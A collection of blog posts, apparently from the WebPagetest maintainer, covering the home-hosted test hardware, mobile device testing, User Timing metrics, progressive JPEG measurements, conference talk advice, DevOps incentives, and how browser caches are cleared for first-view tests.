It has been 3 years since the last tour and a lot of people have been asking if it is still hosted in my basement so it's time for an update.
First, yes it is still hosted out of my basement. I did move it out of the utility room and into a storage room so if the water heater leaks it will no longer take out everything.
Yes, Halloween has gotten a bit out of control.
This is what it looked like last year (in our garage though the video doesn't quite do it justice).
The WebPagetest "rack" is a gorilla shelf that holds everything except for the Android phones.
Starting at the bottom we have the 4 VM Servers that power most of the Dulles desktop testing. Each server is running VMware ESXi (now known as VMware Hypervisor) with ~8 Windows 7 VM's on each. I put the PC's together myself:
- Single socket Supermicro Motherboards with built-in IPMI (remote management)
- Xeon E3 processor (basically a Core i7)
- 32 GB Ram
- Single SSD Drive for VM Storage
- USB Thumb drive (on motherboard) for ESXi hypervisor
The SSDs for the VM storage let me run all of the VM's off of a single drive with no I/O contention because of the insane IOPS you can get from them (I tend to use Samsung 840 Pro's but really looking forward to the 850's).
As far as scaling the servers goes, I load up more VM's than I expect to use, submit a whole lot of tests with all of the options enabled and watch the hypervisor's utilization. I shut down VM's until the CPU utilization stays below 80% (one per CPU thread seems to be the sweet spot).
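The shed-until-under-80% procedure can be sketched as a small loop. This is only an illustration: `peak_cpu_with` is a hypothetical stand-in for "run the full test load with N VM's and read the peak utilization off the hypervisor", and the per-VM cost in `fake_peak` is a made-up number, not a measurement.

```python
from typing import Callable


def vms_to_run(peak_cpu_with: Callable[[int], float],
               start_count: int,
               threshold: float = 0.80) -> int:
    """Shut down VMs one at a time until peak host CPU stays below threshold."""
    count = start_count
    while count > 0 and peak_cpu_with(count) >= threshold:
        count -= 1  # shut down one VM, then re-run the load test
    return count


def fake_peak(vm_count: int) -> float:
    """Made-up measurement: pretend each VM costs ~9.5% of the host CPU."""
    return min(1.0, vm_count * 0.095)


print(vms_to_run(fake_peak, start_count=12))  # prints 8
```

In practice the measurement step is the slow part (a full batch of tests per iteration), so starting a little above the expected count keeps the number of passes small.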
Moving up the rack we have the unraid NAS where the tests are archived for long-term storage (as of this post the array can hold 49TB of data with 18TB used for test results). I have a bunch of other things on the array so not all of the remaining ~30TB is free but I expect to be able to continue storing results for the foreseeable future.
I haven't lost any data (though drives have come and gone) but the main reason I like unraid is if I lose multiple drives it is not completely catastrophic and the data on the remaining drives can still be recovered. It's also great for power because you can have it automatically spin down the drives that aren't being actively accessed.
Next to the unraid array is the stack of Thinkpad T430's that power the "Dulles Thinkpad" test location. They are great if you want to test on relatively high-end physical hardware with GPU rendering. I really like them for test machines because they also have built-in remote management (AMT/vPro in Intel speak) so I can reboot or remotely fix them if anything goes wrong. I have all of the batteries pulled out so the constant recharge cycles don't kill them but if you want built-in battery backup/UPS they work great for that too.
Buried in the corner next to the stack of Thinkpads is the web server that runs www.webpagetest.org.
The hardware mostly matches the VM servers (same motherboard, CPU and memory) but the drive configuration is different. There are 2 SSD's in a RAID 1 array that run the main OS, Web Server and UI and 2 magnetic disks in a RAID 1 array that is used for short-term test archiving (1-7 days) before they are moved off to the NAS. The switch sitting on top of the web server connects the Thinkpads to the main switch (ran out of ports on the main switch).
The top shelf holds the main networking gear and some of the mobile testing infrastructure.
The iPhones are kept in the basement with the rest of the gear and connect over WiFi to an Apple Airport Express. The Apple access points tend to be the most reliable and I haven't had to touch them in years. The access point is connected to a network bridge so that all of the Phone traffic goes through the bridge for traffic shaping. The bridge is running FreeBSD 9.2 which works really well for dummynet and has a fixed profile set up (for now) so that everything going through it sees a 3G connection (though traffic to the web server is configured to bypass the shaping so the test results are fast to upload). The bridge is running on a Supermicro 1U Atom server which is super-low power, has remote management and is more than fast enough for routing packets.
There are 2 iPhones running tests for the mobile HTTP Archive and 2 running tests for the Dulles iPhone testing for WebPagetest. The empty bracket is for the third phone that is usually running tests for Dulles as well but I'm using it for dev work to update the agents to move from mobitest to the new nodejs agent code.
The networking infrastructure is right next to the mobile agents.
The main switch has 2 VLANs on it. One connects directly to the public Internet (the right 4 ports) and the other (all of the other ports) to an internal network. Below the switch is the router that bridges the two networks and NATs all of the test agent traffic (and runs as a DHCP and DNS server). The WebPagetest web server and the router are both connected to the public Internet directly which ended up being handy when the router had software issues and I was in Alaska (I could tunnel through the web server to the management interface on the router to bring it back up). The router is actually the bottom unit and a spare server is on top of it, both are the same 1U atom servers as the traffic-shaping bridge though the router runs Linux.
My Internet connection is awesome (at least by US pre-Google Fiber standards). I am lucky enough to live in an area that has Verizon FIOS (Fiber). I upgraded to a business account (not much more than a residential one) to get the static IP's and I get much better support, 75Mbps down/35Mbps up and super-low latency. The FIOS connection itself hasn't been down at all in at least the last 3 years.
The Android devices are on the main level of the house right now on a shelf in the study, mostly so I don't have to go downstairs in case the devices need a bit of manual intervention (and while we shake out any reliability issues in the new agent code).
The phones are connected through an Anker USB hub to an Intel NUC running Windows 7 where the nodejs agent code runs to manage the testing. The current-generation NUC's don't support remote management so I'm really looking forward to the next release (January or so) which is supposed to add it back. For now I'm just using VNC on the system which gives me enough control to reboot the system or any of the phones if necessary.
The phones are all connected over WiFi to the Access point in the basement (which is directly below them). The actual testing is done over the traffic-shaped WiFi connection but all of the phone management and test processing is done on the tethered NUC system. I tried Linux on it but at the time the USB 3 drivers were just too buggy so it is running Windows (for now). The old android agent is not connected to the NUC and is running mobitest but the other 10 phones are all connected to the same host. I tried connecting an 11th but Windows complained that too many USB device ID's were being used so it looks like the limit (at least for my config) is 10 phones per host. I have another NUC ready to go for when I add more phones.
One of the Nexus 7's is locked in portrait mode and the other is allowed to rotate (which in the stand means landscape). All of the rest of the phones are locked in portrait. I use these stands to hold the phones and have been really happy with them (and have a few spares off to the left of the picture).
At this point the android agents are very stable. They can run for weeks at a time without supervision and when I do need to do something it's usually a matter of remotely rebooting one of the phones (and then it comes right back up). After we add a little more logic to the nodejs agent to do the rebooting itself they should become completely hands-free.
Unlike the desktop testing, the phone screens are on and visible while tests are running so every now and then I worry that the kids may walk in while someone is testing a NSFW site but they don't really go in there (something to be aware of when you set up mobile testing though).
One question I get asked a lot is why I don't host it all in a data center somewhere (or run a bunch of it in the cloud). Maybe I'm old-school but I like having the hardware close by in case I need to do something that requires physical access and the costs are WAY cheaper than if I were to host it somewhere else. The increased power bill is very slight (10's of dollars a month), I'd have an Internet connection anyway so the incremental cost for the business line is also 10's of dollars per month and the server and storage costs were one-time costs that were less than even a couple of months of hosting. Yes, I need to replace drives from time to time but at $150 per 4TB drive, that's still a LOT cheaper than storing 20TB of data in the cloud (not to mention the benefit of having it all on the same network).
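The drive arithmetic is easy to check. The sketch below uses only the figures quoted above ($150 per 4TB drive, 20TB of data) and ignores parity and spare drives; `break_even_months` is a hypothetical helper for plugging in whatever monthly hosted-storage quote you happen to have, since no cloud price is given here.

```python
import math


def drive_cost(data_tb: float, drive_tb: float = 4.0,
               drive_price: float = 150.0) -> float:
    """One-time cost of enough drives to hold data_tb (no parity or spares)."""
    return math.ceil(data_tb / drive_tb) * drive_price


def break_even_months(one_time_cost: float, monthly_hosted_cost: float) -> float:
    """Months of hosted storage that cost the same as buying the drives."""
    return one_time_cost / monthly_hosted_cost


print(drive_cost(20))  # 5 drives x $150 = 750.0
```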
We've been working to bring better support for measuring web performance on mobile for a while. Michael Klepikov started out by building out a new cross-platform test agent for WebPagetest that runs on Node.js, can run WebDriver/Selenium scripts and can talk to the Dev Tools interface for Chrome. Todd Wright extended that support to talk to mobile Chrome on android and even Safari on iOS using a Dev Tools proxy that he created. Browser support has been really good for a while and we could get great request data and full timelines but video has always been the blocker for being able to launch. When Android 4.4 launched with the ability to record 60FPS video on-device with very low overhead it solved the last issue that was holding us back from launching.
WebPageTest now supports Chrome stable and Beta on Android 4.4
For private instances the code is all in GitHub and once it has had a couple of weeks of public use and shaking through any issues I'll cut an official release. If you want to try it out before then you'll need both the web and agent code to support the new video capture capabilities (agent setup instructions are here).
Live on the public instance is a collection of devices in the Dulles location for testing:
- 5 Motorola G's
- 2 Nexus 5's
- 1 Nexus 7 in Portrait Mode
- 1 Nexus 7 in Landscape Mode
To select the devices, just select the Dulles location from the location list and they will show up in the list of browsers.
All of the devices are also available through the API for automated testing with the location ID's available here.
For now all of the devices are using a fixed 3G connection profile but hopefully soon they will have support for arbitrary connection profiles as well.
The video capture on the mobile devices is significantly better than what we have on Desktop and I highly encourage you to try it out. Most of the sites I have tried out take a surprisingly long time to display anything (one second is a good, aggressive target to shoot for). Since the mobile devices support much faster capture than desktop, the filmstrip view in WebPageTest has a new 60FPS option for displaying every frame and being able to see EXACTLY when something was displayed.
The increased resolution really helps when aligning the video with what is happening in the waterfall.
We also get full dev tools timeline views of what is going on which is particularly important on mobile given the slower processing (timelines are captured automatically when video is enabled or optionally in the "Chrome" tab of the advanced settings otherwise).
If you're really adventurous you can also submit WebDriver/Selenium scripts for testing (though it hasn't had a lot of exercise so there may be issues).
Most of the test features that you are used to using on desktop still don't work but over the next few weeks we should be able to fill some of them in as well as add some more mobile-specific capabilities:
- Packet Captures (tcpdump)
- Arbitrary connection profiles
- Testing with Chrome's Data Reduction Proxy enabled
- Arbitrary Chrome command-line switches (will allow for DNS rewriting and cert ignoring)
- Test sharding so individual tests can run in parallel across devices and complete faster
- Storing of response bodies
- Javascript disabling
- SPOF testing
- Basic WPT scripting support (logData, navigate and exec commands initially)
Take the devices for a spin and let us know if you see any issues. If you don't see the devices online it's possible that the agent threw an exception that we didn't handle and I should be able to bring them back online pretty quickly (ping me if it looks like they've been offline for a while).
TL;DR: WebPagetest will now expose any User Timing marks that a page records so you can use the same custom events for your synthetic test measurement as well as your Real User Measurement (and you can use WebPagetest to validate your RUM measurement points).
Before kicking off an optimization effort it is important to have good measurements in place. If you haven't already read Steve Souders' blog post on Moving beyond window.onload(), stop now, go read it and come back.
The Page Load time (start of navigation to the onload event) is the cornerstone metric for most web performance measurement and it is a fundamentally broken measurement that can end up doing even more harm than good by getting developers to focus on the wrong thing. Take two examples of static pages from WebPagetest:
The first is the main test results page that you see after running a test. Fundamentally it consists of the data table and several thumbnail images (waterfalls and screen shots). There are a bunch of other things that make up the page but they aren't the critical parts of the page for the user: ads, social buttons (twitter and g+), the partner logos at the bottom of the page, etc.
Here is what it looks like when it loads:
The parts of the page that the user (and I) care about have completely finished loading in 500ms but the reported page load time is 3 seconds. If I was going to optimize for the page load time I would probably remove the ads, the social widgets, the partner logos and the analytics. The reported onload time would be better but the actual performance for the user experience would not change at all so it would be completely throw-away work (not to mention detrimental to the site itself).
The second is the domains breakdown page which uses the Google visualization libraries to draw pie charts of the bytes and requests by serving domain:
In this case the pie charts actually load after the onload event and measuring the page load time is really just measuring a blank white page.
If you were to compare the load times of both pages using the traditional metrics they would appear to perform about the same but the page with the pie charts has a significantly worse user experience.
This isn't really new information, the work I have been doing on the Speed Index has largely been about providing a neutral way to measure the actual experience and to do it consistently across sites. However, if you own the site you are measuring, you can do a LOT better since you know the parts of the page that matter.
Instrumenting your pages
There are a bunch of Real User Measurement libraries and services available (Google Analytics, SOASTA mPulse, Torbit Insight, Boomerang, Episodes) and most monitoring services also have real-user beacons available as part of their offerings. Out of the box they will usually record the onload time but they usually also have options for custom measurements. Unfortunately they all have their own APIs right now but there is a W3C standard that the performance group nailed down last year for User Timing. It is a very simple API that lets you record point-in-time measurements or events and provides a way to query and clear the list of events. Hopefully everyone will move to leveraging the user timing interfaces and provide a standard way for marking "interesting" events but it's easy enough to build a bridge that takes the user timing events and reports them to whatever you are using for your Real User Measurement (RUM).
As part of working on this for WebPagetest itself I threw together a shim that takes the user timing events and reports them as custom events to Google Analytics and SOASTA's mPulse or Boomerang. If you throw it at the end of your page or load it asynchronously, it will report aggregated user timing events automatically. The "aggregated" part is key because when you are instrumenting a page you can identify when individual elements load but what you really care about is when they have ALL loaded (or all of a particular class of events have happened). The snippet will report the time of the last event that fired and it will also take any period-separated names (group.event) and report the last time for each group. In the case of WebPagetest's result page I have "aft.Header Finished", "aft.First Waterfall" and "aft.Screen Shot" (aft being short for "above-the-fold"). The library will record an aggregate "aft" time that is the point when everything that I consider critical as above-the-fold has loaded.
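To make the aggregation concrete, here is a minimal sketch of the same idea in Python. It is not the shim itself (that runs in the browser); it just shows the "latest mark overall, plus latest mark per period-separated group" logic. The mark names are the ones from the result page, the times are made up for illustration, and the `"(all)"` key is a hypothetical label for the overall value.

```python
from typing import Dict, Iterable, Tuple


def aggregate_marks(marks: Iterable[Tuple[str, float]]) -> Dict[str, float]:
    """Return the latest mark time overall and per period-separated group."""
    latest: Dict[str, float] = {}
    for name, start_time in marks:
        # Overall "last event that fired"
        latest["(all)"] = max(latest.get("(all)", 0.0), start_time)
        # "group.event" names also feed a per-group maximum
        if "." in name:
            group = name.split(".", 1)[0]
            latest[group] = max(latest.get(group, 0.0), start_time)
    return latest


# Times in milliseconds since navigation start (illustrative values only).
marks = [
    ("aft.Header Finished", 120.0),
    ("aft.First Waterfall", 480.0),
    ("aft.Screen Shot", 455.0),
    ("footer", 900.0),
]
print(aggregate_marks(marks))  # {'(all)': 900.0, 'aft': 480.0}
```

Taking the maximum per group is what turns a pile of individual element timings into a single "everything in this group is done" number.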
The results paint a VERY different view of performance than you get from just looking at the onload time and match the filmstrip much better. Here is what the performance of all visitors from the US to the test results page looks like in mPulse.
Page Load (onload):
aft (above-the-fold):
That's a pretty radical difference, particularly in the long-tail. A 13 second 98th percentile is something that I might have freaked out about but 4 seconds is quite a bit more reasonable and actually better represents the user experience.
One of the cool things about the user timing spec is that the interface is REALLY easy to polyfill so you can use it across all browsers. I threw together a quick polyfill (feel free to improve on it - it's really basic) as well as a wrapper that makes it easier to do the actual instrumentation.
Instrumenting your page with the helper is basically just a matter of throwing calls to markUserTime() at points of interest on the page. You can do it with inline script for text blocks:
or more interestingly, as onload handlers for images to record when they loaded:
If you can get away with just using image onload handlers that would be the safest bet because inline scripts can have unintended blocking events where the browser has to wait for previous CSS files to load and process before executing. It's probably not an issue for an inline script block well into the body of a page but something to be aware of.
Bringing some RUM to synthetic testing
Now that you have gone and instrumented your page so that you have good, actionable metrics from your users, it would be great if you could get the same data from your synthetic testing. The latest WebPagetest release will extract the user timing marks from pages being tested and expose them as additional metrics:
At a top-level, there is a new "User Time" metric that reports the latest of all of the user timing marks on the page (this example is from the breakdown pie chart page above where the pie chart shows up just after 3 seconds and after the load event). All of the individual marks are also exposed and they are drawn on the waterfall as vertical purple lines. If you hover over the marker at the top of the lines you can also see details about the mark.
The times are also exposed in the XML and JSON interfaces so you can extract them as part of automated testing (the XML version has the event names normalized):
This works as both a great way to expose custom metrics for your synthetic testing as well as for debugging your RUM measurements to make sure your instrumentation is working as expected (comparing the marks with the filmstrip for example).
TL;DR: Progressive JPEGs are one of the easiest improvements you can make to the user experience and the penetration is a shockingly-low 7%. WebPagetest now warns you for any JPEGs that are not progressive and provides some tools to get a lot more visibility into the image bytes you are serving.
I was a bit surprised when Ann Robson measured the penetration of progressive JPEGs at 7% in her 2012 Performance Calendar article. Instead of a 1,000 image sample, I crawled all 7 million JPEG images that were served by the top 300k websites in the May 1st HTTP Archive crawl and came out with....wait for it.... still only 7% (I have a lot of other cool stats from that image crawl to share but that will be in a later post).
Is The User Experience Measurably Better?
Before setting out and recommending that everyone serve progressive JPEGs I wanted to get some hard numbers on how much of an impact it would have on the user experience. I put together a pretty simple transparent proxy that could serve arbitrary pages, caching resources locally and transcoding images for various different optimizations. Depending on the request headers it would:
- Serve the unmodified original image (but from cache so the results can be compared).
- Serve a baseline-optimized version of the original image (jpegtran -optimize -copy none).
- Serve a progressive optimized version (jpegtran -progressive -optimize -copy none).
- Serve a truncated version of the progressive image where only the first 1/2 of the scan lines are returned (more on this later).
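As a rough sketch of the transcoding step, the two jpegtran modes above map onto command lines like this. The mode names (`original`, `baseline`, `progressive`) and the function itself are hypothetical, not the proxy's actual code; only the jpegtran switches come from the list above, plus jpegtran's standard `-outfile` switch. The truncated mode is left out because it is a byte-level cut of the progressive output rather than a jpegtran option.

```python
from typing import List, Optional

# jpegtran switches for each transcoding mode (mode names are illustrative).
JPEGTRAN_FLAGS = {
    "baseline": ["-optimize", "-copy", "none"],
    "progressive": ["-progressive", "-optimize", "-copy", "none"],
}


def jpegtran_command(mode: str, src: str, dst: str) -> Optional[List[str]]:
    """Return the jpegtran argv for a mode, or None to serve the cached original."""
    if mode == "original":
        return None
    flags = JPEGTRAN_FLAGS[mode]
    return ["jpegtran", *flags, "-outfile", dst, src]


print(jpegtran_command("progressive", "in.jpg", "out.jpg"))
```

The returned list can be handed straight to `subprocess.run(cmd, check=True)` on a machine that has jpegtran installed.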
I then ran a suite of the Alexa top 2,000 e-commerce pages through WebPagetest comparing all of the different modes on a 5Mbps Cable and 1.5Mbps DSL connection. I first did a warm-up pass to populate the proxy caches and then each permutation was run 5 times to reduce variability.
The full test results are available as Google docs spreadsheets for the DSL and Cable tests. I encourage you to look through the raw results and if you click on the different tabs you can get links for filmstrip comparisons for all of the URLs tested (like this one).
Since we are serving the same bytes, just changing HOW they are delivered, the full time to load the page won't change (assuming an optimized baseline image as a comparison point). Looking at the Speed Index, we saw median improvements of 7% on Cable and 15% on DSL. That's a pretty huge jump for a fairly simple serving optimization (and since the exact same pixels get served there should be no question about quality changes or anything else).
Here is what it actually looks like:
Some people may be concerned about the extremely fuzzy first-pass in the progressive case. This test was just done using the default jpegtran scans. I have a TODO to experiment with different configurations to deliver more bits in the first scan and skip the extremely fuzzy passes. By the time you get to 1/2 of the passes, most images are almost indistinguishable from the final image so there is a lot of room for improving the experience.
What this means in WebPagetest
Starting today, WebPagetest will be checking every JPEG that is loaded to see if it is progressive and it will be exposing an overall grade for progressive JPEGs:
The grade weights the images by their size so larger images will have more of an influence. Clicking on the grade will bring you to a list of the images that were not served progressively as well as their sizes.
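If you want to run the same kind of check on your own images, here is a minimal sketch. It is not WebPagetest's implementation: it walks the JPEG marker segments looking for the start-of-frame marker (SOF2, `0xFFC2`, means progressive; SOF0/SOF1 mean sequential) and then computes a byte-weighted score. The exact scoring formula is an assumption on my part; the only thing stated above is that larger images count for more.

```python
import struct
from typing import Iterable, Optional, Tuple

# Markers that stand alone with no length field: TEM, RST0-RST7, SOI.
STANDALONE = {0x01, 0xD8, *range(0xD0, 0xD8)}


def is_progressive(data: bytes) -> Optional[bool]:
    """True for SOF2, False for SOF0/SOF1, None if no frame header is found."""
    if data[:2] != b"\xff\xd8":  # every JPEG starts with SOI
        return None
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            return None  # lost sync with the marker stream
        marker = data[pos + 1]
        if marker == 0xFF:  # fill byte before a marker
            pos += 1
            continue
        if marker in STANDALONE:
            pos += 2
            continue
        if marker == 0xC2:
            return True
        if marker in (0xC0, 0xC1):
            return False
        if marker in (0xDA, 0xD9):  # scan data or end of image: give up
            return None
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        pos += 2 + length  # skip this segment (length includes its own 2 bytes)
    return None


def progressive_score(images: Iterable[Tuple[int, bool]]) -> float:
    """Percent of JPEG bytes that are progressive; items are (size_bytes, progressive)."""
    items = list(images)
    total = sum(size for size, _ in items)
    if total == 0:
        return 100.0  # assumption: nothing to penalize when there are no JPEGs
    good = sum(size for size, progressive in items if progressive)
    return 100.0 * good / total


# One large baseline image outweighs a small progressive one.
print(progressive_score([(90_000, False), (10_000, True)]))  # 10.0
```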
Another somewhat hidden feature that will now give you a lot more information about the images is the "View All Images" link right below the waterfall:
It has been beefed up and now displays optimization information for all of the JPEGs, including how much smaller each one would be when optimized and compressed at quality level 85, whether it is progressive and, if so, the number of scans:
The "Analyze JPEG" link takes you to a view where it shows you optimized versions of the image as well as dumps all of the meta-data in the image so you can see what else is included.
What's next?
With more advanced scheduling capabilities coming in HTTP 2.0 (and already here with SPDY), sites can be even smarter about delivering the image bits and re-prioritize progressive images after enough data has been sent to render a "good" image and deliver the rest of the image after other images on the page have had a chance to display as well. That's a pretty advanced optimization but it will only be possible if the images are progressive to start with (and the 7% number does not look good).
Most image optimization pipelines right now are not generating progressive JPEGs (and aren't stripping out the meta-data because of copyright concerns) so there is still quite a bit we can do there (and that's an area I'll be focusing on).
Progressive JPEGs can be built with almost arbitrary control over the separate scans. The first scan in the default libjpeg/jpegtran setting is extremely blocky and I think we can find a much better balance.
At the end of the day, I'd love to see CDNs automatically apply lossless image optimizations and progressive encoding for their customers while maintaining copyright information. A lot of optimization services already do this and more but since the resulting images are identical to what came from the origin site I'm hoping we can do better and make it more automatic (with an opt-out for the few cases where someone NEEDS to serve the exact bits).
I have the pleasure of helping select the talks for a couple of the Velocity conferences this year and after looking at several hundred proposals it is clear that there are widely varying opinions from submitters on what would make for a good talk and also a lot of cases where the topics may be good but the submitter may have the wrong focus. I'm certainly not an expert on the topic but I think that if you just keep one point in mind when submitting a talk for a tech conference (any tech conference) your odds of getting a talk accepted will go up exponentially:
It is all about the attendees! Period!
When you're submitting a talk, try to frame it in such a way that each attendee will get enough value out of your talk to justify the expense of them attending the conference (conference costs, travel, opportunity cost, etc). If all of the talks meet that criterion then you end up with a really awesome conference.
If you are talking about a technique or toolchain, make sure that attendees will be able to go back to their daily lives and implement what you talked about. More often than not that means the tools need to be readily available (bonus points for open source) and you need to provide enough information that what you did can be replicated. These kinds of talks are also a lot better if they are presented by the team that implemented the "thing" and not by the vendor providing the toolchain. For most tech conferences, the attendees are hands-on so hearing from the actual dev/ops teams that did the work is optimal.
Make sure you understand the target audience as well and make the talks generally applicable. For something like Velocity where the attendees are largely web dev/ops with a focus on scaling and performance, make sure your talk is broadly applicable to them. A talk on implementing low-level networking stacks will not work as well as a talk about how networking stack decisions and tuning impact higher-level applications for example.
What doesn't work?
- Product pitches (there are usually sponsored tracks and exhibit halls for that kind of thing)
- PR. This is not about getting you exposure, it is about educating the attendees.
My favorite web performance article in 2012 was this one from Kyle Rush about the work done on the Obama campaign's site during the 2012 election cycle. They did do some cool things but it wasn't the technical achievements that got my attention, it was the effort that they put into it. They re-architected the platform to serve as efficiently as possible by serving directly from the edge and ran 240 A/B tests to evolve the site from its initial look and feel to the final result at the end of the campaign (with a huge impact on the donations as a result of both efforts).
Contrast that with the Romney tech team, which appears to have contracted a lot of the development out and spent quite a bit more to do it (I wish there was an easy way to compare the impact on the funds raised but the donation patterns across the parties are normally very different).
What I like most is that it demonstrates very clearly how having someone's motivations aligned with the "business" goals is absolutely critical and those are the situations where you usually see the innovative work and larger efforts put in. I see this time and time again in the tech industry and I'm sure it applies elsewhere but it is absolutely critical to be aware of in tech.
Fundamentally that is what DevOps is all about and why the classical waterfall development model is broken:
- Business identifies a "product need"
- Product team specs-out a product to fill that need
- Dev team builds what was specified by the product team (usually as exactly to the requirements as possible, including fussing about pixel-perfect matching the mock-up designs)
- Dev team throws the resulting product over the wall to QA to test and verify against the requirements
- QA team throws the final product over the wall to the Ops team to run
  - Usually forever and long after the dev and product teams have moved on
  - Usually doing all sorts of crazy things to keep the system running (automatic restarts, etc)
By bringing the various teams together and making them have skin in the game they are incented to produce a product that is easier to implement, scales and runs reliably (getting developers on pager duty is easily the fastest way to get server code and architectures fixed).
As you look across your deployment, small site or large, what are the motivating factors for each of the teams responsible for a given component?
The Hosting
If you are not running your own servers then there is a good chance that the company that is running them isn't incentivised to optimize for your needs.
In the case of shared hosting, the hosting provider makes their money by running as many customers on as little hardware as possible. Their goal is to find the edge at which point people start quitting because things perform so badly and make sure they stay as close to that as possible without going beyond it. When I see back-end performance issues with sites, they are almost always on shared hosting and at times it can be absolutely abysmal.
With VPS or dedicated hosting they usually get more money as you need more compute resources. Their incentive is to spend as little time as possible supporting you and certainly not to spend time tuning the server to make it as fast as possible.
If you are running on someone else's infrastructure (which includes the various cloud services so it is increasingly likely that you are), I HIGHLY recommend that you have the in-house skills necessary to tune and manage the servers and serving platforms. You need remote hands-and-eyes to deal with things like hardware failures, but outsourcing the management will hardly ever be a good idea. Having someone on your team who is incented to get as much out of the platform as possible will save you a ton of money in the long term and result in a much better system.
Site Development
You should have the skills and teams in-house to build your sites. Period. If you contract the work out then the company you work with is usually working to do as little work as possible to deliver exactly what you asked for in the requirements document. Yes, they will probably work with you a bit to make sure it makes sense but they are not motivated by how successful the resulting product will be for your business - once they get paid they are on to the next contract.
I see it all too often. Someone will be looking at the performance of their site and there are huge issues, even with some of the basics but they can't fix it. They contracted the site out and what they were delivered "looks" like what they were asked to deliver and functions perfectly well but architecturally it is a mess.
There are great tools available to help you tune your sites (front and back-end) but you need to have the skills in-house to do it. Just like with the Obama campaign, they focused on continuously optimizing the site for the duration of the campaign because they were a part of the team and were motivated by the ultimate business goals, not by some requirements document that they needed to check all of the boxes to.
Maybe I'm a bit biased since I'm a software guy who also likes to do the end-to-end architectures and system tuning but I absolutely believe that these are skills you need to have or develop as part of your actual team in order to be successful. Contracting out for expertise also makes sense as long as they are educating your team as you go along and it's more about the education and getting you on the right track.
CDNs
Maybe it's my tinfoil hat getting a bit tight, but given that CDNs usually bill you for the number of bits they serve on your behalf, it doesn't feel like they are particularly motivated to make sure you are only serving as many bits as you need to. Always gzipping content where appropriate is one of the biggest surprises. It seems like a no-brainer but most CDNs will just pass through whatever your server responds with and won't do the simple optimization of gzipping as much as possible (most of them have it as an available setting but it is not enabled by default).
Certainly you don't want to be building your own CDN but you should be paying very careful attention to the configuration of your CDN(s) to make sure the content they are serving is optimized for your needs.
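To get a feel for how many bits are at stake, here is a minimal Python sketch that estimates what gzip would save on a response body. The function name and the sample payload are made up for illustration; it only measures compressibility locally and says nothing about how any particular CDN is configured.

```python
import gzip


def gzip_savings(body: bytes, level: int = 6) -> dict:
    """Report how many bytes gzip would save for a response body."""
    compressed = gzip.compress(body, compresslevel=level)
    saved = len(body) - len(compressed)
    return {
        "original_bytes": len(body),
        "gzipped_bytes": len(compressed),
        # Guard against dividing by zero for an empty body.
        "saved_percent": round(100.0 * saved / len(body), 1) if body else 0.0,
    }


if __name__ == "__main__":
    # Hypothetical, highly repetitive markup (typical of HTML/CSS/JS).
    sample = b"<div class='item'>hello world</div>\n" * 500
    print(gzip_savings(sample))
```

Running something like this against the text resources your origin actually serves, and comparing it with the bytes the CDN delivers, is a quick way to spot content that is going out uncompressed.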
Motivations/Incentives
Finally, just because you have the resources in-house doesn't mean that their motivations are aligned with the business. In the classic waterfall example, the dev teams are not normally motivated to make sure the systems they build are easy to operate (resilient, self-healing, etc). In a really small company where the tech people are also founders then it is pretty much a given that their incentives are very well aligned but as your company gets larger it becomes a lot harder to maintain that alignment. Product dogfooding, DevOps and Equity sharing are all common techniques to try to keep the alignment which is why you see all of those so often in the technical space.
OK, time to put away the soapbox - I'd love to hear how other people feel about this, particularly counter arguments where it does make sense to completely hand-off responsibility to a third-party.
I've spent the last week or so getting the IE testing in WebPagetest up to snuff for IE 10. I didn't want to launch the testing until everything was complete because there were some issues that impacted the overall timings and I didn't want people to start drawing conclusions about browser comparisons until the data was actually accurate.
The good news is that all of the kinks have been ironed out and I will be bringing up some Windows 8 + IE 10 VM's over the Thanksgiving holidays (have some new hardware on the way because the current servers are running at capacity).
In the hopes that it helps other people doing browser testing I wanted to document the hoops that WebPagetest goes through to ensure that "First View" (uncached) tests are as accurate as possible.
Clearing The Caches
It's pretty obvious, but the first thing you need to do for first view tests is clear the browser caches. In the good old days this pretty much just meant the history, cookies and object caches, but browsers have evolved a lot over the years. They now store all sorts of other data and heuristic information that helps them load pages faster, and to properly test first view page loads you need to nuke all of it.
For Chrome, Firefox and Safari it is actually pretty easy to clear out all of the data. You can just delete the contents of the profile directory which is where each browser stores all of the per-user data and you essentially get a clean slate. There are a few shared caches that you also want to make sure to clear out:
DNS Cache - WebPagetest clears this by calling DnsFlushResolverCache in dnsapi.dll and falling back to running "ipconfig /flushdns" from a shell.
Flash Storage - Delete the "\Macromedia\Flash Player\#SharedObjects" directory
Silverlight Storage - Delete the "\Microsoft\Silverlight" directory
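The steps above can be sketched in Python roughly as follows. This is an illustration, not WebPagetest's actual (native) code: the helper names are hypothetical, the caller is expected to pass in the full profile and storage directories (the paths above are relative to the user's application data folder), and the DNS flush only does anything on Windows.

```python
import ctypes
import shutil
import subprocess
import sys
from pathlib import Path


def clear_directory_contents(directory: Path) -> int:
    """Delete everything inside `directory` but keep the directory itself.

    Returns the number of top-level entries that were removed.
    """
    removed = 0
    if not directory.is_dir():
        return removed
    for entry in directory.iterdir():
        if entry.is_dir() and not entry.is_symlink():
            shutil.rmtree(entry, ignore_errors=True)
        else:
            entry.unlink()
        removed += 1
    return removed


def flush_dns_cache() -> bool:
    """Windows only: call DnsFlushResolverCache, fall back to ipconfig."""
    if sys.platform != "win32":
        return False
    try:
        # DnsFlushResolverCache is exported by dnsapi.dll and returns a BOOL.
        if ctypes.WinDLL("dnsapi.dll").DnsFlushResolverCache():
            return True
    except (OSError, AttributeError):
        pass
    return subprocess.run(["ipconfig", "/flushdns"]).returncode == 0
```

Calling clear_directory_contents on the browser profile directory, the Flash shared objects directory and the Silverlight directory, followed by flush_dns_cache, covers the list above for the non-IE browsers.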
That will be enough to get the non-IE browsers into a clean state but IE is a little more difficult since it is pretty tightly interwoven into the OS as we learned a few years back.
The first one to be aware of is the OS certificate store. Up until a few months ago WebPagetest wasn't clearing that out and it was causing the HTTPS negotiations to be faster than they would be in a truly first view scenario. On Windows 7, all versions of IE will do CRL and/or OCSP validation of certificates used for SSL/TLS negotiation. That validation can be EXTREMELY expensive (several round trips for each validation) and the results were being cached in the OS certificate store. This made the HTTPS performance in IE appear faster than it really was for true first view situations.
To clear the OS certificate stores we run a pair of commands:
certutil.exe -urlcache * delete
certutil.exe -setreg chain\ChainCacheResyncFiletime @now
IE 10 introduced another cache where it keeps track of the different domains that a given page references so it can pre-resolve and pre-connect to them (Chrome has similar logic but it gets cleared when you nuke the profile directory). No matter how you clear the browser caches (even through the UI), the heuristic information persists and the browser would pre-connect for resources on a first view.
